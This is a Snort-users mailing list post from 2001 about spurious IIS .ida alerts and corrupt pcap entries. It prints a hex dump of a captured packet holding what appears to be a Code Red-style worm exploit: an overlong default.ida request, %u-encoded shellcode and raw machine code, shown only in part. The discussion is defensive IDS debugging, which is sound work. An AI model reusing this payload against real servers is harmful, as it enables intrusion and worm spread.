Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: spurious .ida attempt detects "and corrupt pcap file"

From: Phil Wood <cpw () lanl gov>
Date: Fri, 16 Nov 2001 10:35:08 -0700
I happened to look at my pcap (-b) file on a 1.8.3 run and it had some
what I figured were snort crafted pcap entries with all zeros in the
beginning of the "packet".  In my case, the IP and TCP headers were 
also zero.  However, down further in the data area, there was this something
that reminded me of NIMDA:

tcpdump -n -r log/codered/last.CR not tcp -c 1 -s 1514 -x | hextotex
1 packets received by filter
16:53:26.082431 0:0:0:0:0:0 > 0:0:0:0:0:0 sap 00 I (s=0,r=0,C) len=1500
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000502  00503b0c :                  P;  :
  753b111f  a69d5018  77c40000  00000000  00000000 : u;    P w            :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00000000  00000000 :                      :
  00000000  00000000  00000000  00004745  54202f64 :               GET /d :
  65666175  6c742e69  64613f4e  4e4e4e4e  4e4e4e4e : efault.ida?NNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e00  00000000 : NNNNNNNNNNNNNNN      :
  00000000  00000000  0000c303  00000078  00fa2025 :                x   % :
  75393039  30257536  38353825  75636264  33257537 : u9090%u6858%ucbd3%u7 :
  38303125  75393039  30257536  38353825  75636264 : 801%u9090%u6858%ucbd :
  33257537  38303125  75393039  30257539  30393025 : 3%u7801%u9090%u9090% :
  75383139  30257530  30633325  75303030  33257538 : u8190%u00c3%u0003%u8 :
  62303025  75353331  62257535  33666625  75303037 : b00%u531b%u53ff%u007 :
  38257530  30303025  7530303d  61202048  5454502f : 8%u0000%u00=a  HTTP/ :
  312e300d  0a436f6e  74656e74  2d747970  653a2074 : 1.0  Content-type: t :
  6578742f  786d6c0a  484f5354  3a777777  2e776f72 : ext/xml HOST:www.wor :
  6d2e636f  6d0a2041  63636570  743a202a  2f2a0a43 : m.com  Accept: */* C :
  6f6e7465  6e742d6c  656e6774  683a2033  35363920 : ontent-length: 3569  :
  0d0a0d0a  558bec81  ec180200  00535657  8dbde8fd :     U        SVW     :
  ffffb986  000000b8  cccccccc  f3abc785  70feffff :                 p    :
  00000000  e90a0b00  008f8568  feffff8d  bdf0feff :            h         :
  ff64a100  00000089  47086489  3d000000  00e96f0a :  d      G d =     o  :
  00008f85  60feffff  c785f0fe  ffffffff  ffff8b85 :     `                :
  68feffff  83e80789  85f4feff  ffc78558  feffff00 : h              X     :
  00e077e8  9b0a0000  83bd70fe  ffff000f  85dd0100 :   w       p          :
  008b8d58  feffff81  c1000001  00898d58  feffff81 :    X           X     :
  bd58feff  ff000000  78750ac7  8558feff  ff0000f0 :  X      xu   X       :
  bf8b9558  feffff33  c0668b02  3d4d5a00  000f859a :    X   3 f  =MZ      :
  0100008b  8d58feff  ff8b513c  8b8558fe  ffff33c9 :      X    Q<  X   3  :
  668b0c10  81f95045  00000f85  79010000  8b9558fe : f     PE    y     X  :
  ffff8b42  3c8b8d58  feffff8b  54017803  9558feff :    B<  X    T x  X   :
  ff899554  feffff8b  8554feff  ff8b480c  038d58fe :    T     T    H   X  :


On Fri, Nov 16, 2001 at 04:55:37PM +1300, Russell Fulton wrote:


I have just realised that there is something else odd about these 
alerts, the MAC addresses are both zero:

[**] [1:1243:1] WEB-IIS ISAPI .ida attempt [**]
 [Classification: Attempted Administrator Privilege Gain] [Priority: 10]
 11/16-14:39:24.545389 0:0:0:0:0:0 -> 0:0:0:0:0:0 type:0x0 len:0x24E
 130.123.128.24:1754 -> 130.216.35.105:80 TCP TTL:240 TOS:0x10 ID:0 
IpLen:20 DgmLen:576
 ***AP*** Seq: 0xCB6CF3A1 Ack: 0xE03784F8 Win: 0x7DA0 TcpLen: 20


-- 
Phil Wood, cpw () lanl gov


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: